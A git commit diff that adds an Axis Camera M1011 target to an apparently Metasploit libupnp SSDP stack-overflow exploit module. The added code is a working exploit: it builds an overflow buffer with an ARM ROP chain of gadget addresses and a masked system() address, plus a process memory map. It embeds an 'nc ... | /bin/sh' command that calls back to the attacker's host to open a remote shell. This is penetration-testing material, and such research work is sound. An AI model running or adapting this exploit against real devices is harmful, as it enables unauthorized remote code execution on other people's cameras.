add new target in libupnp_ssdp_overflow exploit : Axis Camera M1011

frederic · frederic · commit 63940d438e72 · 2013-07-30T01:56:10.000+02:00
diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb
@@ -25,7 +25,8 @@ def initialize(info = {})
 			'Author'         => [
 					'hdm',                                              # Exploit dev for Supermicro IPMI
 					'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI
-					'Richard Harman <richard[at]richardharman.com>'     # Binaries, system info, testing for Supermicro IPMI
+					'Richard Harman <richard[at]richardharman.com>',    # Binaries, system info, testing for Supermicro IPMI
+					'Frederic Basse <contact[at]fredericb.info>'        # Exploit dev for Axis Camera M1011
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -90,6 +91,21 @@ def initialize(info = {})
 
 						# Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)
 
+					} ],
+					[ "Axis Camera M1011 5.20.1 UPnP/1.4.1", {
+
+						# The callback handles all target-specific settings
+						:callback => :target_axis_m1011_141,
+
+						# This matches any line of the SSDP M-SEARCH response
+						:fingerprint =>
+							/SERVER:\s*Linux\/2\.6\.31, UPnP\/1\.0, Portable SDK for UPnP devices\/1\.4\.1/mi
+						#
+						# SSDP response:
+						#	Linux/2.6.31, UPnP/1.0, Portable SDK for UPnP devices/1.4.1
+						#	http://192.168.xx.xx:49152/rootdesc1.xml
+						#	uuuid:Upnp-BasicDevice-1_0-00123456789A::upnp:rootdevice
+
 					} ],
 
 					[ "Debug Target", {
@@ -223,6 +239,111 @@ def target_supermicro_ipmi_131
 
 	end
 
+	# These devices are armv5tejl, run version 1.4.1 of libupnp, have random stacks, but no PIE on libc
+	def target_axis_m1011_141
+
+		# Create a fixed-size buffer for the payload
+		buffer = Rex::Text.rand_text_alpha(2000)
+
+		# Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()
+		buffer[0,1]     = '"'
+		buffer[1999,1]  = '"'
+
+		# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
+		cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
+
+		# Start a listener
+		start_listener()
+
+		# Figure out the port we picked
+		cbport = self.service.getsockname[2]
+
+		# Initiate a callback connection
+		cmd = "sleep 1; /usr/bin/nc #{cbhost} #{cbport}|/bin/sh;exit;#"
+		buffer[1, cmd.length] = cmd
+
+		# Mask to avoid forbidden bytes, popped into $r4
+		buffer[284,4] = [0x0D0D0D0D].pack("V")
+
+		# Move $r4 to $r0
+		buffer[304,4] = [0x40093848].pack("V")
+			#MEMORY:40093848 MOV     R0, R4
+			#MEMORY:4009384C LDMFD   SP!, {R4,PC}
+
+		# Masked system() address (0x32FB9D83 + 0x0D0D0D0D = 0x4008AA90), popped into $r4
+		buffer[308,4] = [0x32FB9D83].pack("V")
+
+		# Set $r0 to system() address : $r0 = $r4 + $r0
+		buffer[312,4] = [0x40093844].pack("V")
+			#MEMORY:40093844 ADD     R4, R4, R0
+			#MEMORY:40093848 MOV     R0, R4
+			#MEMORY:4009384C LDMFD   SP!, {R4,PC}
+
+		# Move $r0 to $r3 : system() address
+		buffer[320,4] = [0x400D65BC].pack("V")
+			#MEMORY:400D65BC MOV     R3, R0
+			#MEMORY:400D65C0 MOV     R0, R3
+			#MEMORY:400D65C4 ADD     SP, SP, #0x10
+			#MEMORY:400D65C8 LDMFD   SP!, {R4,PC}
+
+		# Move $r2 to $r0 : offset to buffer[-1]
+		buffer[344,4] = [0x400ADCDC].pack("V")
+			#MEMORY:400ADCDC MOV     R0, R2
+			#MEMORY:400ADCE0 ADD     SP, SP, #8
+			#MEMORY:400ADCE4 LDMFD   SP!, {R4-R8,PC}
+
+		# Negative offset to command str($r0 + 0xFFFFFEB2 = buffer[1]), popped into R4
+		buffer[356,4] = [0xFFFFFEB2].pack("V")
+
+		# Set $r0 to command str offset : $r0 = $r4 + $r0
+		buffer[376,4] = [0x40093844].pack("V")
+			#MEMORY:40093844 ADD     R4, R4, R0
+			#MEMORY:40093848 MOV     R0, R4
+			#MEMORY:4009384C LDMFD   SP!, {R4,PC}
+
+		# Jump to system() function
+		buffer[384,4] = [0x4009FEA4].pack("V")
+			#MEMORY:4009FEA4 MOV     PC, R3
+
+		return buffer
+=begin
+		00008000-0002b000 r-xp 00000000 1f:03 62         /bin/libupnp
+		00032000-00033000 rwxp 00022000 1f:03 62         /bin/libupnp
+		00033000-00055000 rwxp 00000000 00:00 0          [heap]
+		40000000-4001d000 r-xp 00000000 1f:03 235        /lib/ld-2.9.so
+		4001d000-4001f000 rwxp 00000000 00:00 0 
+		40024000-40025000 r-xp 0001c000 1f:03 235        /lib/ld-2.9.so
+		40025000-40026000 rwxp 0001d000 1f:03 235        /lib/ld-2.9.so
+		40026000-4002e000 r-xp 00000000 1f:03 262        /lib/libparhand.so
+		4002e000-40035000 ---p 00008000 1f:03 262        /lib/libparhand.so
+		40035000-40036000 rwxp 00007000 1f:03 262        /lib/libparhand.so
+		40036000-4004a000 r-xp 00000000 1f:03 263        /lib/libpthread-2.9.so
+		4004a000-40051000 ---p 00014000 1f:03 263        /lib/libpthread-2.9.so
+		40051000-40052000 r-xp 00013000 1f:03 263        /lib/libpthread-2.9.so
+		40052000-40053000 rwxp 00014000 1f:03 263        /lib/libpthread-2.9.so
+		40053000-40055000 rwxp 00000000 00:00 0 
+		40055000-4016c000 r-xp 00000000 1f:03 239        /lib/libc-2.9.so
+		4016c000-40173000 ---p 00117000 1f:03 239        /lib/libc-2.9.so
+		40173000-40175000 r-xp 00116000 1f:03 239        /lib/libc-2.9.so
+		40175000-40176000 rwxp 00118000 1f:03 239        /lib/libc-2.9.so
+		40176000-40179000 rwxp 00000000 00:00 0 
+		40179000-4017a000 ---p 00000000 00:00 0 
+		4017a000-40979000 rwxp 00000000 00:00 0 
+		40979000-4097a000 ---p 00000000 00:00 0 
+		4097a000-41179000 rwxp 00000000 00:00 0 
+		41179000-4117a000 ---p 00000000 00:00 0 
+		4117a000-41979000 rwxp 00000000 00:00 0 
+		41979000-4197a000 ---p 00000000 00:00 0 
+		4197a000-42179000 rwxp 00000000 00:00 0 
+		42179000-4217a000 ---p 00000000 00:00 0 
+		4217a000-42979000 rwxp 00000000 00:00 0 
+		42979000-4297a000 ---p 00000000 00:00 0 
+		4297a000-43179000 rwxp 00000000 00:00 0 
+		bef4d000-bef62000 rw-p 00000000 00:00 0          [stack]
+=end
+
+	end
+
 	# Generate a buffer that provides a starting point for exploit development
 	def target_debug
 		buffer = Rex::Text.pattern_create(2000)
